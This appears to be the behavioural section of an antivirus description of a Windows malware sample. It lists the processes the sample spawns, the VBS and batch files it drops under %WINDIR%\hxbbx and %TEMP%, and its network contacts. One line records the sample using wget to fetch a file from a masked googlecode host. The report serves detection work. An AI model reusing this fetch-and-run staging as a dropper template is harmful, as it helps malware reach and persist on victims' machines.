Техническая информация
- '%WINDIR%\hxbbx\wget.exe' http://hx###.#ooglecode.com/files/latest.txt -m
- '%WINDIR%\hxbbx\aupdate.exe'
- '%WINDIR%\hxbbx\hxbbx1.0.exe'
- '<SYSTEM32>\wscript.exe' "%WINDIR%\hxbbx\w.vbs"
- '<SYSTEM32>\wscript.exe' "%WINDIR%\hxbbx\up.vbs"
- '<SYSTEM32>\wscript.exe' "%WINDIR%\hxbbx\encry.vbs"
- '<SYSTEM32>\mode.com' con cols=45 lines=15
- <SYSTEM32>\cmd.exe
- %WINDIR%\hxbbx\w.txt
- %TEMP%\~2.bat
- %TEMP%\~1.bat
- %WINDIR%\hxbbx\up.vbs
- %WINDIR%\hxbbx\hxbbx.googlecode.com\files\latest.txt
- %WINDIR%\hxbbx\w.vbs
- %WINDIR%\hxbbx\hxbbx1.0.exe
- %WINDIR%\hxbbx\CHOICE.EXE
- %WINDIR%\hxbbx\aupdate.exe
- %WINDIR%\hxbbx\aup2.bat
- %WINDIR%\hxbbx\encry.vbs
- %WINDIR%\hxbbx\wget.exe
- %TEMP%\~2.bat
- %TEMP%\~1.bat
- %WINDIR%\hxbbx\hxbbx.googlecode.com\files\latest.txt в %WINDIR%\hxbbx\latest.txt
- 'hx###.#ooglecode.com':80
- hx###.#ooglecode.com/files/latest.txt
- DNS ASK hx###.#ooglecode.com
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'